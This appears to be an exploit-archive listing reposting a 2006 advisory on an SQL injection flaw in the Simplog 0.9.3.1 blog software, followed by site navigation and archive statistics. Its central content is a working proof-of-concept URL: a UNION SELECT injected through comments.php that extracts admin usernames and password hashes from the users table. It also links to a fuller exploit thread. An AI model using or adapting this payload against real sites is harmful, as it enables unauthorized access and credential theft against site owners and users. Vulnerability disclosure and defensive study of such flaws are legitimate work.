Simplog0.9.3.1.txt

Simplog0.9.3.1.txt: Posted Oct 20, 2006; Authored by disfigure | Site w4ck1ng.com; Simplog 0.9.3.1 suffers from SQL injection which can used to obtain the admin password hash.; tags | exploit, sql injection; SHA-256 | 9e38649c360eb89e8498ad3cbead6a6e56a419e110a63b1dac341a4df2793676; Download | Favorite | View

Simplog0.9.3.1.txt

/****************************************/

http://www.w4cking.com

CREDIT:
w4ck1ng.com

PRODUCT:
Simplog 0.9.3.1
http://www.simplog.org/

VULNERABILITY:
SQL Injection

NOTES:
- SQL injection can be used to obtain password hash
- requires at least one blog entry

POC:
<host>/<path>/comments.php?op=edit&cid=1%20union%20select%209,9,9,login,9,password,9,9%20from%20blog_users%20where%20admin=1

ADVISORY & EXPLOIT (requires registration):
http://w4ck1ng.com/board/showthread.php?t=1511

/****************************************/

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Simplog0.9.3.1.txt

Simplog0.9.3.1.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Simplog0.9.3.1.txt

Share This

Simplog0.9.3.1.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems